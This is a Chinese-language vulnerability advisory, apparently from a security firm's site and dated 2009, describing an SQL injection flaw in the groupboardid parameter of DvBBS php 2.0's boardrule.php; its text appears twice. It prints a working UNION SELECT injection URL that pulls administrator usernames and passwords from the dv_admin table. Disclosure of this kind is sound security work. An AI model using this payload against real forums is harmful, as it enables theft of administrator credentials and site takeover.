维信联合科技
动网论坛DvBBS boardrule.php模块SQL注入漏洞
2009-09-09
受影响系统:
动网论坛 Dvbbs php 2.0
描述:BUGTRAQ ID: 36282
DVBBS是一款Aspsky.Net开发和维护的开放源码ASP Web论坛程序。
DvBBS没有正确地过滤用户提交给boardrule.php模块的groupboardid参数,远程攻击者可以通过向论坛提交恶意参数请求执行SQL注入攻击。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://site.com/[Path]/boardrule.php?groupboardid=1/**/union/**/select/**/concat(0xBAF3CCA8D3C3BBA7C3FBA3BA,username,0x202020C3DCC2EBA3BA,password)/**/from%20dv_admin%20where%20id%20between%201%20and%204/**/
建议:厂商补丁:
动网论坛
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.dvbbs.net/
动网论坛 Dvbbs php 2.0
描述:BUGTRAQ ID: 36282
DVBBS是一款Aspsky.Net开发和维护的开放源码ASP Web论坛程序。
DvBBS没有正确地过滤用户提交给boardrule.php模块的groupboardid参数,远程攻击者可以通过向论坛提交恶意参数请求执行SQL注入攻击。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://site.com/[Path]/boardrule.php?groupboardid=1/**/union/**/select/**/concat(0xBAF3CCA8D3C3BBA7C3FBA3BA,username,0x202020C3DCC2EBA3BA,password)/**/from%20dv_admin%20where%20id%20between%201%20and%204/**/
建议:厂商补丁:
动网论坛
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.dvbbs.net/